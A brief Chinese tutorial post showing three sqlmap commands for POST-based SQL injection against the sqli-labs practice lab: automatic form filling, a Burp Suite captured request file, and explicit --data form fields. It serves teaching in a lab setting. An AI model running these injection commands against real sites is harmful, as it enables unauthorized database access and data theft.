当前位置: 代码迷 >> 综合 >> Sqlmap POST注入 三种方法
  详细解决方案

Sqlmap POST注入 三种方法

热度:81   发布时间:2024-01-24 12:37:55.0

一、自动填写表单

sqlmap.py -u "http://192.168.20.66/sqli-labs/Less-13/" --forms

二、Sqlmap结合BurpSuite

1.抓取post提交的数据包
2、全选抓包的数据,右键 -> Copy 就可以保存到 1.txt 文档中;
在这里插入图片描述
3、sqlmap -r 指定文件

sqlmap.py -r  "1.txt"

三、指定表单注入
指定表单注入是Sqlmap POST注入第三种方法,这个其实也需要抓包的。当然,不抓也可以,查看源代码等什么的也不是不可以,只是抓包比较精准而已。只要能知道指定的表单数据就可以了!
在这里插入图片描述

sqlmap.py -u http://localhost//sqli-labs/Less-13/  --data="uname=admin&passwd=admin"
  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.